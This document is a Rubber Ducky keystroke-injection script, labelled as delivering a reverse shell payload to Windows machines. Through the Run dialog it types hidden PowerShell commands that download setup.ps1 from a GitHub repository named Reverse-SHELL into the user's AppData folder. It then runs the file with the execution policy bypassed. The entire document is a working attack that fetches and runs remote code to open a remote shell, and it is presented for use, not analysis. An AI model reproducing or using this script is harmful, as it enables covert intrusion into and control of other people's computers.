REM Rubber Ducky Script to Write Reverse Shell Payload
################################################################################ STARTING ##############################################################################################
DELAY 500
GUI r
DELAY 500
STRING powershell -WindowStyle hidden Invoke-WebRequest -uri "https://raw.githubusercontent.com/SmartBoyMuzaffar/Reverse-SHELL/master/setup.ps1" -outfile "$env:appdata\setup.ps1"
DELAY 500
ENTER
DELAY 1000
GUI r
DELAY 500
STRING powershell powershell -WindowStyle hidden -ExecutionPolicy Bypass $env:appdata\setup.ps1
DELAY 500
ENTER
################################################################################## FINISHING ##################################################################################
